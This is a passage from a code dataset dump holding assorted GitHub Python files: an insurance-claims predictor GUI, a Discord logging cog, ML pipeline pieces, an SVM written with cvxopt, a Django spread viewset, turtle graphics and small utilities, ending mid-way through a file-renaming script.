maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n occ=list(test.OCCURRENCE)\n tokenizer4 = Tokenizer(split='\\n')\n tokenizer4.fit_on_texts(test.OCCURRENCE.values)\n post_seq4 = tokenizer4.texts_to_sequences(test.OCCURRENCE.values)\n test[\"OCCURRENCE\"] = pad_sequences(post_seq4, maxlen=MAX_LENGTH)\n \n x_data1=np.array(test.drop([\"DRIVERAGE\",\"YORKPAID\",\"VEHAGE\",\"PCLUSTER\"],axis=1))\n #x_num=np.array(data[\"DRIVERAGE\"])\n x_num1=np.array(test.drop([\"STATE\",\"COVERAGE\",\"OCCURRENCE\",\"IPOLNO\",\"PCLUSTER\"],axis=1))\n \n a={0:'A',1:'B',2:'C',3:'D'}\n \n yp=model.predict([x_data1,x_num1])\n \n print(yp)\n \n y_classes = yp.argmax(axis=-1)\n \n print(y_classes)\n \n for i in range(len(y_classes)):\n test[\"STATE\"][i]=state[i]\n test[\"COVERAGE\"][i]=cov[i]\n test[\"IPOLNO\"][i]=ipolno[i]\n test[\"OCCURRENCE\"][i]=occ[i]\n #print(y_classes[i],a[y_classes[i]])\n test[\"PCLUSTER\"][i]=a[y_classes[i]]\n \n pd.set_option('display.expand_frame_repr', False) \n \n print(test)\n \n return test\n\n\n# In[35]:\n\ndef printtext():\n global entry_1\n global string\n string = entry_1.get() \n accept=pred(string)\n text.insert(INSERT, accept)\n\nfrom tkinter import *\nroot = Tk()\nroot.title('Claims Prediction')\ntext = Text(root)\nlabel_1=Label(root,text=\"Enter File Path\")\nentry_1=Entry(root)\nlabel_1.pack()\nentry_1.pack()\nentry_1.focus_set()\nb = Button(root,text='Enter',command=printtext)\nb.pack(side=TOP)\ntext.pack(expand=True, fill='both')\n\nroot.mainloop()\n\n\n# In[ ]:\n\n\n\n","repo_name":"starlordsaraf/Insurance-Claims-Prediction-CDSAML","sub_path":"K+fold+on+classify+7.py","file_name":"K+fold+on+classify+7.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13777991981","text":"from asyncio import sleep\nfrom datetime import datetime, timezone, timedelta\n\nfrom discord.errors import NotFound\nfrom discord.ext import commands\n\nfrom core.message_constructor import MessageConstructor as MC\n\n\nclass Overseer(commands.Cog):\n \"\"\"Overseer Cog\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.tzinfo = timezone(timedelta(hours=3))\n\n async def respond(self, ctx, **kvargs):\n reply = await ctx.message.reply(**kvargs)\n await sleep(15)\n try:\n await reply.delete()\n except NotFound:\n pass\n try:\n await ctx.message.delete()\n except NotFound:\n pass\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandInvokeError):\n i = str(error).find(\"CommandInputError:\")\n if i != -1:\n message_body = MC.error(str(error)[i + 18:])\n await self.respond(ctx, **message_body)\n else:\n raise error\n elif isinstance(error, commands.MissingRequiredArgument):\n message_body = MC.error(\"Missing arguments.\")\n await self.respond(ctx, **message_body)\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n time = datetime.now(self.tzinfo).strftime(\"%Y-%m-%d-%H:%M:%S\")\n guild = str(ctx.guild.id)\n author = f\"{ctx.author.name}#{ctx.author.discriminator}\"\n command = ctx.command.qualified_name\n params = \", \".join(ctx.args[2:])\n with open(\"data/commands.log\", \"a\") as f:\n f.write(f\"{time} {guild} {author} {command} {params}\\n\")\n","repo_name":"Fudge1234513/judgedeath2","sub_path":"cog_overseer.py","file_name":"cog_overseer.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10259630765","text":"import sys\nimport os\nfrom src.exception import CustomException\nfrom src.logger import logging\nfrom src.utils import read_data_from_mongodb\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom dataclasses import dataclass\n\nfrom src.components.data_transformation import DataTransformation\nfrom src.components.data_transformation import DataTransformationConfig\n\nfrom src.components.model_trainer import ModelTrainerConfig\nfrom src.components.model_trainer import ModelTrainer\n\n@dataclass\nclass DataIngestionConfig:\n train_data_path : str = os.path.join('artifacts','train.parquet')\n test_data_path : str = os.path.join('artifacts','test.parquet')\n raw_data_path : str = os.path.join('artifacts','data.parquet')\n\n\nclass DataIngestion:\n def __init__(self):\n self.ingestion_config = DataIngestionConfig()\n\n def initiate_data_ingestion(self):\n logging.info('Entered the data ingestion method')\n\n try:\n #df = pd.read_parquet('data/data_for_model_prep.csv')\n df = read_data_from_mongodb(database_name='PoliceIncidents',table_name='data_model_training')\n logging.info('Read the dataset from mongo db')\n\n os.makedirs(os.path.dirname(self.ingestion_config.train_data_path),exist_ok=True)\n df.to_parquet(self.ingestion_config.raw_data_path)\n\n logging.info('Train test split initiated')\n train_set, test_set = train_test_split(df,test_size=0.2,random_state=42)\n\n train_set.to_parquet(self.ingestion_config.train_data_path)\n test_set.to_parquet(self.ingestion_config.test_data_path)\n\n logging.info('Data ingestion completed')\n\n return (\n self.ingestion_config.train_data_path,\n self.ingestion_config.test_data_path\n\n )\n except Exception as e:\n raise CustomException(e,sys)\n \n\nif __name__==\"__main__\":\n obj=DataIngestion()\n train_data,test_data=obj.initiate_data_ingestion()\n\n data_transformation=DataTransformation()\n train_arr,test_arr,_=data_transformation.initiate_data_transformation(train_data,test_data)\n\n modeltrainer=ModelTrainer()\n print(modeltrainer.initiate_model_trainer(train_arr,test_arr))","repo_name":"pjeena/Crime-rate-prediction-using-CI-CD-pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"269016589","text":"import nbformat as nbf\nfrom typing import Optional\nfrom random_filename import get_random_name\n\n\ndef create_notebook(text_content, output_file: Optional[str] = 'output.ipynb'):\n\n\n \n if output_file == 'output.ipynb' or output_file == None:\n output_file = get_random_name()\n \n # Initialize notebook object\n nb = nbf.v4.new_notebook()\n\n # Process the text content\n lines = text_content.split(\"\\n\")\n in_code_block = False\n code_lines = []\n markdown_lines = []\n\n for line in lines:\n if not in_code_block and \"```python\" in line:\n in_code_block = True\n if markdown_lines:\n markdown_cell = nbf.v4.new_markdown_cell(\"\\n\".join(markdown_lines))\n nb.cells.append(markdown_cell)\n markdown_lines.clear()\n elif in_code_block and \"```\" in line:\n in_code_block = False\n if code_lines:\n code_cell = nbf.v4.new_code_cell(\"\\n\".join(code_lines))\n nb.cells.append(code_cell)\n code_lines.clear()\n elif in_code_block:\n code_lines.append(line)\n else:\n markdown_lines.append(line)\n\n with open(output_file, \"w\", encoding=\"utf-8\") as f:\n nbf.write(nb, f)\n\n return output_file\n\n\n\ndef create_notebook_from_file(text_file, output_file: Optional[str] = 'output.ipynb'):\n\n with open(text_file, \"r\", encoding=\"utf-8\") as f:\n text_content = f.read()\n notebook = create_notebook(text_content, output_file)\n\n return notebook\n \n\n","repo_name":"JamesFincher/nbAPI","sub_path":"dev_resources/testing/utils_create_notebook/create_notebook.py","file_name":"create_notebook.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71582745324","text":"import Controller\nimport Model\nimport View\n\ndef Choise():\n print('Вы хотите ввести выражение?')\n choise = int(input('1.Да \\n'\n '2.Нет\\n'\n 'Ваш выбор: '))\n while choise == 1:\n Model.expression_list = input('Введите выражение: ')\n Controller.res_expression(Model.expression_list)\n break\n else:\n Model.init_first()\n while True:\n if Model.init_ops():\n break\n Model.init_second()\n Controller.oper()\n View.print_total()\n Model.first = Model.result\n\nChoise()","repo_name":"katerinapavlova13/Seminar7_Calculate_dz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17827827336","text":"import uuid\nimport datetime\nfrom flask import Flask\nfrom flask import render_template\n\n\ndef AD():\n ret = {}\n ret['adId'] = str(uuid.uuid4())\n ret['campaignId'] = 0\n ret['keyWords'] = []\n ret['relevanceScore'] = 0\n ret['pClick'] = 0\n ret['bidPrice'] = 0\n ret['rankScore'] = 0\n ret['qualityScore'] = 0\n ret['costPerClick'] = 0\n ret['position'] = 0\n ret['title'] = ''\n ret['price'] = 0\n ret['thumbnail'] = ''\n ret['description'] = ''\n ret['brand'] = ''\n ret['detail_url'] = ''\n ret['query'] = ''\n ret['query_group_id'] = 0\n ret['category'] = ''\n return ret\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n data = {\n 'tm': datetime.datetime.now(),\n 'ads': [AD(), AD(), AD(), AD(), AD(), AD()]\n }\n return render_template('mission4_template.html', data=data)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yusenjeng/amazon_crawler","sub_path":"3. search_service/mission4/mission4.py","file_name":"mission4.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28499498569","text":"import numpy as np\nimport leidenalg\nimport igraph as ig\n\nfrom sklearn.neighbors import kneighbors_graph\n\n\ndef louvain_clusters(latent, k=10, rands=0):\n nn_matrix = kneighbors_graph(latent, k)\n rows, cols = np.where(nn_matrix.todense() == 1)\n edges = [(row, col) for row, col in zip(rows, cols)]\n g = ig.Graph()\n g.add_vertices(latent.shape[0])\n g.add_edges(edges)\n res = leidenalg.find_partition(g, leidenalg.ModularityVertexPartition, seed=rands)\n clusters = np.asarray(res.membership)\n return clusters\n","repo_name":"suswei/single-cell-rna-seq","sub_path":"scvi/inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"33684567807","text":"from setuptools import setup, find_packages\n\nversion = '0.1'\n\nwith open('README.rst', 'rt') as readme:\n description = readme.read()\n\nwith open('CHANGES.txt', 'rt') as changes:\n history = changes.read()\n\n\nsetup(\n name='keyboardtools',\n version=version,\n description=\"\",\n long_description=description + '\\n' + history,\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=['Development Status :: 1 - Pre-Alpha',\n 'Programming Language :: Python :: 3.4',\n 'License :: OSI Approved :: MIT License',\n ],\n keywords='',\n author='Lennart Regebro',\n author_email='regebro@gmail.com',\n url='https://github.com/regebro/keyboardtools',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n test_suite='tests',\n entry_points={\n 'console_scripts': [\n 'kbt-logkeys=keyboardtools.analyze:logkeys',\n ],\n }\n)\n","repo_name":"regebro/keyboardtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"18449230784","text":"import logging\nimport json\n\nfrom django import http\n\n\nlog = logging.getLogger(__name__)\n\nPLAIN_TEXT_OUTPUT_TYPE = 'PlainText'\nSSML_OUTPUT_TYPE = 'SSML'\n\nSIMPLE_CARD = 'Simple'\nLINK_ACCOUNT_CARD = 'LinkAccount'\n\n\ndef create_simple_card(title, content):\n return {\n \"type\": SIMPLE_CARD,\n \"title\": title,\n \"content\": content,\n }\n\n\ndef create_link_account_card():\n return {\"type\": LINK_ACCOUNT_CARD, }\n\n\nclass EchoResponse(http.HttpResponse):\n def __init__(self, output_speech, *args, **kwargs):\n kwargs.setdefault('content_type', 'application/json;charset=UTF-8')\n\n reprompt = kwargs.pop('reprompt', None)\n if reprompt:\n reprompt = self.get_speech_object(reprompt)\n\n response_body = {\n \"version\": \"1.0\",\n \"response\": {\n \"outputSpeech\": self.get_speech_object(output_speech),\n \"card\": kwargs.pop('card', None),\n \"reprompt\": reprompt,\n \"shouldEndSession\": kwargs.pop('should_end_session', True)\n },\n \"sessionAttributes\": kwargs.pop('session', {})\n }\n\n log.debug(response_body)\n data = json.dumps(response_body)\n super(EchoResponse, self).__init__(content=data, **kwargs)\n\n def is_ssml(self, text):\n text = text.strip()\n return text.startswith('') and text.endswith('')\n\n def get_speech_object(self, text):\n if self.is_ssml(text):\n return {\n \"type\": SSML_OUTPUT_TYPE,\n \"ssml\": text\n }\n else:\n return {\n \"type\": PLAIN_TEXT_OUTPUT_TYPE,\n \"text\": text\n }\n","repo_name":"bunchesofdonald/django-echo","sub_path":"echo/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"39518064147","text":"from copy import copy\nfrom uuid import UUID\n\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.apps import apps\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError as DjangoValidationError\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import viewsets, status as response_status\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.throttling import AnonRateThrottle, UserRateThrottle\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import LimitOffsetPagination\n\nfrom .serializers import (\n CreateSpreadSerializer,\n ListSpreadSerializer,\n RetrieveSpreadSerializer,\n RetrievePublicSpreadSerializer,\n UpdateSpreadSerializer\n)\nfrom ....helpers import build_result_pagination\n\nSpread = apps.get_registered_model('feeder', 'Spread')\n\n# Define to avoid used ...().paginate__\n_PAGINATOR = LimitOffsetPagination()\n\n\nclass BaseViewSet(viewsets.ViewSet):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.context = dict()\n\n def initialize_request(self, request, *args, **kwargs):\n self.context.update({'request': request})\n return super().initialize_request(request, *args, **kwargs)\n\n\nclass SpreadViewSet(BaseViewSet):\n \"\"\"\n GET\n -----\n\n .../spreads/?fragment=uuid4&broadcast=uuid4\n\n\n POST\n -----\n\n { \n \"content_type\": \"fragment\",\n \"object_id\": \"uuid4\",\n \"allocation\": 14,\n \"expiry_at\": \"Date time\",\n \"introduction\": \"A something...\"\n }\n\n\n PATCH\n -----\n\n {\n \"allocation\": 14,\n \"expiry_at\": \"Date time\",\n \"introduction\": \"A something...\"\n }\n \"\"\"\n lookup_field = 'uuid'\n permission_classes = (IsAuthenticated,)\n throttle_classes = (UserRateThrottle, AnonRateThrottle,)\n permission_action = {\n 'retrieve': (AllowAny,),\n }\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns\n the list of permissions that this view requires.\n \"\"\"\n try:\n # return permission_classes depending on `action`\n return [permission() for permission in self.permission_action[self.action]]\n except KeyError:\n # action is not set return default permission_classes\n return [permission() for permission in self.permission_classes]\n\n def queryset(self):\n return Spread.objects \\\n .prefetch_related('content_type', 'content_object') \\\n .select_related('content_type') \\\n .filter(\n Q(fragment__user_id=self.request.user.id)\n | Q(broadcast__user_id=self.request.user.id)\n )\n\n def queryset_instance(self, uuid, for_update=False):\n try:\n if for_update:\n return self.queryset().select_for_update().get(uuid=uuid)\n return self.queryset().get(uuid=uuid)\n except ObjectDoesNotExist:\n raise NotFound()\n\n def queryset_public_instance(self, identifier):\n try:\n return self.queryset().get(identifier=identifier)\n except ObjectDoesNotExist:\n raise NotFound()\n\n @transaction.atomic\n def create(self, request, format=None):\n serializer = CreateSpreadSerializer(\n data=request.data,\n context=self.context\n )\n\n if serializer.is_valid(raise_exception=True):\n try:\n serializer.save()\n except DjangoValidationError as e:\n raise ValidationError(detail=str(e))\n return Response(serializer.data, status=response_status.HTTP_201_CREATED)\n return Response(serializer.errors, status=response_status.HTTP_406_NOT_ACCEPTABLE)\n\n @transaction.atomic\n def partial_update(self, request, uuid=None, format=None):\n instance = self.queryset_instance(uuid, for_update=True)\n serializer = UpdateSpreadSerializer(\n instance,\n data=request.data,\n context=self.context,\n partial=True\n )\n\n if serializer.is_valid(raise_exception=True):\n try:\n serializer.save()\n except DjangoValidationError as e:\n raise ValidationError(detail=str(e))\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n return Response(serializer.errors, status=response_status.HTTP_406_NOT_ACCEPTABLE)\n\n @transaction.atomic()\n def delete(self, request, uuid=None):\n try:\n instance = self.queryset().get(uuid=uuid)\n except ObjectDoesNotExist:\n raise NotFound()\n\n # copy for response\n instance_copy = copy(instance)\n\n # run delete\n instance.delete()\n\n # return object\n serializer = RetrieveSpreadSerializer(\n instance_copy,\n context=self.context\n )\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n\n def list(self, request, format=None):\n queryset = self.queryset()\n fragment = request.query_params.get('fragment', None)\n broadcast = request.query_params.get('broadcast', None)\n\n if not fragment and not broadcast:\n raise ValidationError(detail={\n 'param': _(\"Fragment or Broadcast required\")\n })\n\n if fragment and broadcast:\n raise ValidationError(detail={\n 'param': _(\"Can't use both Fragment and Broadcast\")\n })\n\n try:\n # validate uuid here\n # read this docs: https://docs.djangoproject.com/en/3.2/ref/contrib/contenttypes/\n if fragment:\n queryset = queryset.filter(\n Q(fragment__isnull=False) & Q(fragment__uuid=fragment)\n )\n\n if broadcast:\n queryset = queryset.filter(\n Q(broadcast__isnull=False) & Q(broadcast__uuid=broadcast)\n )\n except DjangoValidationError as e:\n raise ValidationError(detail={\n 'param': str(e)\n })\n\n paginator = _PAGINATOR.paginate_queryset(queryset, request)\n serializer = ListSpreadSerializer(\n paginator,\n context=self.context,\n many=True\n )\n\n results = build_result_pagination(self, _PAGINATOR, serializer)\n return Response(results, status=response_status.HTTP_200_OK)\n\n def retrieve(self, request, uuid=None, format=None):\n valid_uuid = True\n try:\n UUID(uuid).version\n except ValueError:\n valid_uuid = False\n\n if valid_uuid:\n instance = self.queryset_instance(uuid)\n serializer = RetrieveSpreadSerializer(\n instance,\n context=self.context\n )\n else:\n instance = self.queryset_public_instance(uuid)\n serializer = RetrievePublicSpreadSerializer(\n instance,\n context=self.context\n )\n\n return Response(serializer.data, status=response_status.HTTP_200_OK)\n","repo_name":"PUYUP/kirimsaran","sub_path":"apps/feeder/api/v1/spread/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41257751613","text":"\n\n\nfrom sklearn.base import BaseEstimator\nimport numpy as np\nimport cvxopt.solvers\ncvxopt.solvers.options['show_progress'] = False\n\ndef compute_w(multipliers, X, y):\n return sum(multipliers[i] * y[i] * X[i] for i in range(len(y)))\n\ndef compute_b(w, X, y):\n return sum([y[i] - np.dot(w, X[i]) for i in range(len(X))])/len(X)\n\n\n\n\nclass SVC(BaseEstimator):\n\n def __init__(self):\n pass\n\n\n def get_K(self, X):\n \"\"\"\n https://cvxopt.org/examples/tutorial/qp.html\n If X = array([ [0, 1],\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9]])\n K = \n array([ 1, 3, 5, 7, 9, 3, 13, 23, 33, 43, 5, 23, 41,\n 59, 77, 7, 33, 59, 85, 111, 9, 43, 77, 111, 145])\n reshape as \n array([ [ 1, 3, 5, 7, 9],\n [ 3, 13, 23, 33, 43],\n [ 5, 23, 41, 59, 77],\n [ 7, 33, 59, 85, 111],\n [ 9, 43, 77, 111, 145]])\n \"\"\"\n K = np.array([np.dot(X[i], X[j])\n for j in range(self.m)\n for i in range(self.m)]).reshape((self.m, self.m))\n return K\n\n\n\n def fit(self, X, y):\n \"\"\"\n convert y into -1, 1, dtype: float\n \"\"\"\n self.classes_, y = np.unique(y, return_inverse=True)\n y = np.where(y == 0, -1, y).astype(np.float64)\n\n self.m, self.n = X.shape\n K = self.get_K(X)\n\n\n P = cvxopt.matrix(np.outer(y, y) * K)\n q = cvxopt.matrix(-1 * np.ones(self.m))\n # print(P.size, q.size)\n # Equality constraints\n A = cvxopt.matrix(y, (1, self.m))\n b = cvxopt.matrix(0.0)\n # Inequality constraints\n G = cvxopt.matrix(np.diag(-1 * np.ones(self.m)))\n h = cvxopt.matrix(np.zeros(self.m))\n\n # Solve the problem\n solution = cvxopt.solvers.qp(P, q, G, h, A, b)\n # Lagrange multipliers\n multipliers = np.ravel(solution['x'])\n\n has_positive_multiplier = multipliers > 1e-7\n sv_multipliers = multipliers[has_positive_multiplier]\n # print(sv_multipliers)\n support_vectors = X[has_positive_multiplier]\n support_vectors_y = y[has_positive_multiplier]\n\n w = compute_w(multipliers, X, y)\n self.coef_ = compute_w(sv_multipliers, support_vectors, support_vectors_y)\n self.intercept_ = compute_b(w, support_vectors, support_vectors_y) # -9.666668268506335\n\n\n\n def predict(self, X):\n y = np.dot(X, self.coef_) + self.intercept_\n return self.classes_.take(np.asarray(np.where(y > 0, 1, 0), dtype=np.intp))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/ml-learn","sub_path":"src/learn/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9815683852","text":"import turtle as t\r\nfrom turtle import Screen\r\nimport random\r\n\r\nturt = t.Turtle()\r\nturt_screen = Screen()\r\nturt_screen.setup(width=600,height=600)\r\nt.colormode(255)\r\ncolor_list = [(250, 249, 249), (207, 165, 165), (164, 169, 169), (140, 48, 48), (244, 79, 79), (3, 144, 144), (241, 66, 66), (249, 220, 220), (2, 142, 142), (162, 55, 55)]\r\nturt.speed(10)\r\n\r\ndistance = 0\r\n\r\ndef initial_position(distance):\r\n turt.hideturtle()\r\n turt.penup()\r\n turt.goto(-250,(-250+distance))\r\n turt.pendown()\r\n\r\n\r\nfor iter1 in range(10):\r\n initial_position(distance)\r\n distance += 50\r\n for iter2 in range(10):\r\n turt.dot(20,random.choice(color_list))\r\n turt.penup()\r\n turt.forward(50)\r\n\r\n\r\nturt_screen.exitonclick()\r\n","repo_name":"Wewilo/100-Days-of-Code-Python","sub_path":"Day 18 Hirst Painting/hirst_painting.py","file_name":"hirst_painting.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23513002531","text":"menu = [\r\n [\"egg\", \"spam\", \"bacon\"],\r\n [\"egg\", \"sausage\", \"bacon\"],\r\n [\"egg\", \"spam\"],\r\n [\"egg\", \"bacon\", \"spam\"],\r\n [\"egg\", \"bacon\", \"sausage\", \"spam\"],\r\n [\"spam\", \"bacon\", \"sausage\", \"spam\"],\r\n [\"spam\", \"egg\", \"spam\", \"spam\", \"bacon\", \"spam\"],\r\n [\"spam\", \"egg\", \"sausage\", \"spam\"],\r\n [\"chicken\", \"chips\"]\r\n]\r\nmeals = []\r\nfor meal in menu:\r\n if \"spam\" not in meal:\r\n # print(meal)\r\n meals.append(meal)\r\n else:\r\n meals.append(\"a meal was skipped\")\r\n# an if clause or filter added to the comprehension\r\nmeals = [meal for meal in menu if \"spam\" not in meal and \"chicken\" not in meal]\r\nprint(meals)\r\n\r\n# More readible than the fussy_meals below\r\nfussy_meals = [meal for meal in menu if \"spam\" in meal or \"eggs\" in meal if not\r\n (\"bacon\" in meal and \"sausage\" in meal)]\r\nprint(fussy_meals)\r\n\r\n\r\n\r\nfussy_meals = [meal for meal in menu if\r\n (\"spam\" in meal or \"eggs\" in meal) and not (\"bacon\" in meal and \"sausage\" in meal)]\r\nprint(fussy_meals)\r\n\r\n# CONDITIONAL COMPREHENSIONS\r\n\r\n# [meal for meal in menu if \"spam\" not in meal]\r\n# expression iteration filter(s)\r\n\r\n# This conditional list comprehension now specifies a filter, extending the incomplete def above line 17\r\n\r\n# A comprehension has an expression, in this example, the value of a meal.\r\n# After the comprehension comes the iteration which is followed by one or more filters.\r\n# [expression iteration filter(s)]","repo_name":"brunoreyes/python_fundamentals","sub_path":"condcomp.py","file_name":"condcomp.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19644459654","text":"import os\nimport PIL.Image as pli\nimport numpy as np\nimport scipy.io as sio\n\n\nclass CountLocations:\n def __init__(self, **kwargs):\n self.data = self.get_full_path(kwargs.pop('gt_data'))\n self.numfiles = kwargs.pop('numfiles')\n\n def get_gt(self, index, count):\n d = sio.loadmat(\n os.path.join(self.data, 'IMG_{}_{}.mat'.format(index, count)))\n dt = d['final_gt']\n return dt\n\n def get_full_path(self, rel_path, makedir=False):\n directory = os.path.join(\n os.path.dirname(\n os.path.abspath(\n __file__\n )\n ),\n rel_path\n )\n if makedir:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n return directory\n\n def count_locations(self):\n counts = {}\n for i in range(1 ,self.numfiles + 1):\n count = 0\n for j in range(1, 10):\n gt = self.get_gt(i, j)\n _loc = gt[gt > 0]\n count += len(_loc)\n counts[i] = count \n return counts\n\nif __name__ == '__main__':\n print(\"UCF Data\")\n t = CountLocations(**{\n 'gt_data': 'ucf_data/gt/',\n 'numfiles': 50\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n print()\n print(\"ST Data A Test\")\n\n t = CountLocations(**{\n 'gt_data': 'st_data_A_test/gt/',\n 'numfiles': 182\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n print()\n print(\"ST Data A Train\")\n\n t = CountLocations(**{\n 'gt_data': 'st_data_A_train/gt/',\n 'numfiles': 300\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n print()\n print(\"ST Data B Test\")\n\n t = CountLocations(**{\n 'gt_data': 'st_data_B_test/gt/',\n 'numfiles': 316\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n print()\n print(\"ST Data B Train\")\n\n t = CountLocations(**{\n 'gt_data': 'st_data_B_train/gt/',\n 'numfiles': 400\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n print()\n print(\"UCSD Data\") \n\n t = CountLocations(**{\n 'gt_data': 'ucsd_data/gt/',\n 'numfiles': 2000\n })\n counts = t.count_locations()\n _min = min(counts, key=counts.get)\n _max = max(counts, key=counts.get)\n\n\n print(\"Min: {}; Max: {}\".format(counts[_min], counts[_max]))\n print(\"Min Image: {}; Max image: {}\".format(_min, _max))\n\n\n","repo_name":"cvcpp1/data","sub_path":"count_locations.py","file_name":"count_locations.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71915289324","text":"import numpy as np\n\ndef get_probs_from_CPTs(sample, fs):\n probs = []\n\n for i, f in fs.items():\n cpt = f.table\n rvs = f.nb\n values = []\n # get the index (variable assigment) of CPT\n for rv in rvs:\n value = sample[rv.name]\n values.append(value)\n\n values = tuple(values)\n prob = cpt[values]\n # avoid the probability of 0 or small value\n if prob == 0 or prob < 1e-6:\n prob = 1e-5\n\n probs.append(prob)\n\n #print(\"probs for this assignment: \", probs)\n return probs\n\n\ndef log_likelihood(probs):\n result = 0\n for p in probs:\n result += np.log(p)\n return result\n\n\n# probs = get_probs_from_CPTs([1,1,1], fs)\n# result = log_likelihood(probs)\n# print(\"log likelihood: \", result)\n\ndef log_likelihood_per_sample(sample, fs):\n probs = get_probs_from_CPTs(sample, fs)\n result = log_likelihood(probs)\n return result\n#\n# result = log_likelihood_per_sample([1,1,1], fs)\n# print(\"log likelihood from learned model: \", result)\n#\n# result = log_likelihood_per_sample([1,1,1], true_fs)\n# print(\"log likelihood from true model: \", result)\n\ndef diff_per_sample(sample, fs, true_fs):\n LL_learned = log_likelihood_per_sample(sample, fs)\n LL_true = log_likelihood_per_sample(sample, true_fs)\n return np.abs(LL_learned - LL_true)\n# print(\"difference: \", diff_per_sample([1,1,1], fs, true_fs))\n\ndef dif_sum(test_file, fs, true_fs):\n # samples = np.loadtxt(\"data/dataset1/test.txt\", skiprows=1, dtype='int')\n samples = np.loadtxt(test_file, skiprows=1, dtype='int')\n total = 0\n for i in range(samples.shape[0]):\n dif_sample = diff_per_sample(samples[i], fs, true_fs)\n # print(f\"{i}th dif: {dif_sample}\")\n total += dif_sample\n\n print(\"log likelihood difference = : \", total)\n return total","repo_name":"YoungSean/PGM-Learning-Algorithms","sub_path":"LL_dif.py","file_name":"LL_dif.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1488205294","text":"## This script allows you to rename a directory of files using an excel table containing both the original filenames and desired filenames.\n## Simply enter the directory below, accompanies by an excel file containing headers 'Input Filename' and Output Filename' and execute.\n\nimport pandas as pd\nimport os\n\ndir = r'' ## Enter directory where files are\n\nfilenameTable = pd.read_excel(r'C:\\Users\\om11\\Documents\\Rename 